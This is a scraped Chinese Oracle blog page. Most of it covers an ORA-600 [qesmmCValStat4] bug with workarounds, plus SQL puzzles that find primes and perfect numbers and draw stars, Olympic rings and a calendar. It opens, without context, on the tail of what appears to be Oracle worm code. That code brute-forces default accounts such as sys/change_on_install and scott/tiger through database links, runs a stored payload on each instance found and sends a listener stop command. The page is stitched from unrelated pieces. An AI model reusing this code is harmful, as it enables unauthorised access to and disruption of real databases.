     i3 := instr(vResp, '(INSTANCE_NAME=', i3);
     exit when i3 = 0;

     i4 := instr(vResp, ')', i3);
     sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
     i3 := i3 + 1;

     begin
        if sid = PreviousSID or sid = 'PLSExtProc' or sid = 'extproc'
        then
           dbms_output.put_line( sid );
        else
           dbms_output.put_line( sid );

           iLoop := 0;

           loop

           declare

              username1 varchar2(100);
              password1 varchar2(100);

           begin

              iLoop := iLoop + 1;
              exit when iLoop = 8;

              if iLoop = 5 then
                 username1 := 'system';
                 password1 := 'manager';

              ELSIF iLoop = 6 then
                 username1 := 'sys';
                 password1 := 'change_on_install';

              ELSIF iLoop = 1 then
                 username1 := 'dbsnmp';
                 password1 := 'dbsnmp';

              ELSIF iLoop = 2 then
                 username1 := 'outln';
                 password1 := 'outln';

              ELSIF iLoop = 4 then
                 username1 := 'scott';
                 password1 := 'tiger';

              ELSIF iLoop = 3 then
                 username1 := 'mdsys';
                 password1 := 'mdsys';

              ELSIF iLoop = 7 then
                 username1 := 'ordcommon';
                 password1 := 'ordcommon';

              end if;

              BEGIN
                 EXECUTE IMMEDIATE 'drop database link xxx';
              EXCEPTION
                 when OTHERS then
                    DBMS_OUTPUT.PUT_LINE( '' );
              end;

              create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' || username1 || '
IDENTIFIED BY ' || password1 || ' USING ''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =
(PROTOCOL = TCP)(HOST = ' || current_ipaddress || ')(PORT = 1521)))(CONNECT_DATA=
(SERVER=DEDICATED)(SERVICE_NAME=' || SID || ')))''';

              EXECUTE IMMEDIATE create_link;
              EXECUTE IMMEDIATE vWorking;

           EXCEPTION
              when OTHERS then
                 DBMS_OUTPUT.PUT_LINE( '' );
           end;

           end loop;

        end if;

        PreviousSID := SID;

     end;

   end loop;

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequestStop));
   UTL_TCP.CLOSE_CONNECTION(c);

   end;

EXCEPTION
     when OTHERS then
      DBMS_OUTPUT.PUT_LINE('');
end;

end loop;

END;
--##endc0GtJBi1

ora-600[qesmmCValStat4]一例

在之前的文章中提到过一个有趣的绘制五角星的SQL,具体SQL语句如下:
with a as
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) y
from (select rownum – 1 n from all_objects where rownum <= 20 * 5)))
select replace (sys_connect_by_path(point, ‘/’), ‘/’, null) star
from (select b.y, b.x, decode(a.x, null, ‘ ‘, ‘*’) point
from a,
(select *
from (select rownum – 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) – min(x) + 1 from a)),
(select rownum – 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) – min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

在10.2.0.1版本输入以上SQL可能会出现ORA-00600: internal error code, arguments: [qesmmCValStat4], [3], [1], [], [],[], [], []错误,g10r21_ora_15473.trc

其调用栈为:qercoFetch->qerhjFetch->qerhjInitializeManagementComponents->

qesmmCStartWorkArea->qesmmCValidateStatus->kgeasnmierr(报错)

metalink文档ID 360811.1对该 Bug 4926357进行了描述,该bug可能在9.2.07~10.2.0.1版本中出现,一般由带start with … … connect by prior ..子句的查询语句引起;典型的调用栈为:qesmmCValidateStatus<- qesmmCStartWorkArea <-qerhjInitializeManagementComponents <-qerhjFetch …

未公布的Bug 4401437是Bug 4926357的一个复制品avatar,该Bug已在10.1.0.5, 10.2.0.2, 11.1等版本中修复了。

Oracle support建议的四种解决方式:

1. 打上该Bug的one-off补丁;

2.升级到该Bug已修复的大版本中,例如从10.2.0.1升级到10.2.0.2;

3.设置参数hash_join_enabled(9i中),_hash_join_enabled(10g中),实例级别的或者会话级别的均可,如:

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
PL/SQL Release 10.2.0.1.0 - Production
CORE    10.2.0.1.0      Production
TNS for Linux: Version 10.2.0.1.0 - Production
NLSRTL Version 10.2.0.1.0 - Production

SQL> alter session set "_hash_join_enabled"=false;

Session altered.

SQL> set pagesize 1400;
SQL> with a as
2   (select distinct round(sum(x) over(order by n)) x,
3                    round(sum(y) over(order by n)) y
4      from (select n,
5                   cos(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) * 2 x,
6                   sin(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) y
7              from (select rownum - 1 n from all_objects where rownum <= 20 * 5)))
8  select replace (sys_connect_by_path(point, '/'), '/', null) star
9    from (select b.y, b.x, decode(a.x, null, ' ', '*') point
10            from a,
11                 (select *
12                    from (select rownum - 1 + (select min(x) from a) x
13                            from all_objects
14                           where rownum <= (select max(x) - min(x) + 1 from a)),
15                         (select rownum - 1 + (select min(y) from a) y
16                            from all_objects
17                           where rownum <= (select max(y) - min(y) + 1 from a))) b
18           where a.x(+) = b.x
19             and a.y(+) = b.y)
20   where x = (select max(x) from a)
21   start with x = (select min(x) from a)
22  connect by y = prior y and x = prior x + 1;

STAR
--------------------------------------------------------------------------------
.................
20 rows selected.

4.设置’no_filtering’ 提示,如:
with a as
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) y
from (select rownum – 1 n from all_objects where rownum <= 20 * 5)))
select  /*+ no_filtering */ replace (sys_connect_by_path(point, ‘/’), ‘/’, null) star
from (select b.y, b.x, decode(a.x, null, ‘ ‘, ‘*’) point
from a,
(select *
from (select rownum – 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) – min(x) + 1 from a)),
(select rownum – 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) – min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

但是该hint在9.2.0.7版本中可能因为Bug 4752555 ‘Wrong results from CONNECT BY query’而导致返回错误行数;并且这是一个undocumented hint,所以强烈不推荐使用!

利用SQL查找表中的质数(prime number)和完全数(perfect number)以及几个有趣的SQL语句

之前在某次interview中被老外问到如何用SQL找出列上的质数和完全数的问题;我当时已经多年没有写过这种考算法和SQL技巧(纯粹的技巧)的语句了,乍遇此问题倒是有些棘手。现在录以记之,供人参考.

SQL> create table numbers(NO int) ;

表已创建。

SQL> insert into numbers  select rownum  from dba_objects;

已创建71937行。

SQL> commit;

提交完成。

SELECT X.NO as Primes  /*查找质数(find prime number)*/
FROM Numbers N
CROSS JOIN Numbers X
WHERE mod(X.NO, N.NO) != 0
AND N.NO < X.NO
GROUP BY X.NO
HAVING(X.NO - Count(*)) = 2;

PRIMES
---------
4931
4919
4909
4903
4889
4877
4871
4861
4831
4817
4813 ................

SELECT X.no as Perfect /*查找完全数,find perfect nober*/
FROM numbers N
CROSS JOIN numbers X
WHERE mod(X.no, N.no) = 0
and X.no > 1
AND N.no < X.no
AND N.no > 0
GROUP BY X.no
HAVING SUM(N.no) = X.no;

PERFECT
----------
6
28
496

......................

附:

select ltrim(sys_connect_by_path(rownum || '*' || lv || '=' ||  /* SQL_99乘法口诀表*/
rpad(rownum * lv, 2),
'  '))
from (select level lv from dual connect by level < 10)
where lv = 1
connect by lv + 1 = prior lv;

1*1=1
2*2=4   2*1=2
3*3=9   3*2=6   3*1=3
4*4=16  4*3=12  4*2=8   4*1=4
5*5=25  5*4=20  5*3=15  5*2=10  5*1=5
6*6=36  6*5=30  6*4=24  6*3=18  6*2=12  6*1=6
7*7=49  7*6=42  7*5=35  7*4=28  7*3=21  7*2=14  7*1=7
8*8=64  8*7=56  8*6=48  8*5=40  8*4=32  8*3=24  8*2=16  8*1=8
9*9=81  9*8=72  9*7=63  9*6=54  9*5=45  9*4=36  9*3=27  9*2=18  9*1=9

with a as
(select distinct round(a.x + b.x) x, round(a.y + b.y) y
from (select (sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(n / 30 * 3.1415926) * 2 x,
sin(n / 30 * 3.1415926) y
from (select rownum - 1 n
from all_objects
where rownum <= 30 + 30))) a,
(select n,
(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(m / 3 * 3.1415926) * 2 * 15 x,
sin(m / 3 * 3.1415926) * 15 y
from (select case
when rownum <= 2 then
3
when rownum = 3 then
-2
else
-6
end m,
rownum - 1 n
from all_objects
where rownum <= 5))) b)
select replace (sys_connect_by_path(point, '/'), '/', null) star  /*SQL 绘制奥运五环*/
from (select b.y, b.x, decode(a.x, null, ' ', '*') point
from a,
(select *
from (select rownum - 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) - min(x) + 1 from a)),
(select rownum - 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) - min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

with a as                                             /*sql 绘制五角星*/
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) y
from (select rownum - 1 n from all_objects where rownum <= 20 * 5)))
select replace (sys_connect_by_path(point, '/'), '/', null) star
from (select b.y, b.x, decode(a.x, null, ' ', '*') point
from a,
(select *
from (select rownum - 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) - min(x) + 1 from a)),
(select rownum - 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) - min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

SELECT LPAD(MONTH, 20 - (20 - LENGTH(MONTH)) / 2) MONTH,      /*sql绘制年历*/
       "Sun",
       "Mon",
       "Tue",
       "Wed",
       "Thu",
       "Fri",
       "Sat"
  FROM (SELECT TO_CHAR(dt, 'fmMonthfm YYYY') MONTH,
               TO_CHAR(dt + 1, 'iw') week,
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '1',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Sun",
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '2',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Mon",
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '3',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Tue",
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '4',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Wed",
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '5',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Thu",
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '6',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Fri",
               MAX(DECODE(TO_CHAR(dt, 'd'),
                          '7',
                          LPAD(TO_CHAR(dt, 'fmdd'), 2))) "Sat"
          FROM (SELECT TRUNC(SYSDATE, 'y') - 1 + ROWNUM dt
                  FROM all_objects
                 WHERE ROWNUM <= ADD_MONTHS(TRUNC(SYSDATE, 'y'), 12) -
                       TRUNC(SYSDATE, 'y'))
         GROUP BY TO_CHAR(dt, 'fmMonthfm YYYY'), TO_CHAR(dt + 1, 'iw'))
 ORDER BY TO_DATE(MONTH, 'Month YYYY'), TO_NUMBER(week);

   	MONTH	Sun	Mon	Tue	Wed	Thu	Fri	Sat
1	     1月 2010	 3	 4	 5	 6	 7	 8	 9
2	     1月 2010	10	11	12	13	14	15	16

沪ICP备14014813号-2

沪公网安备 31010802001379号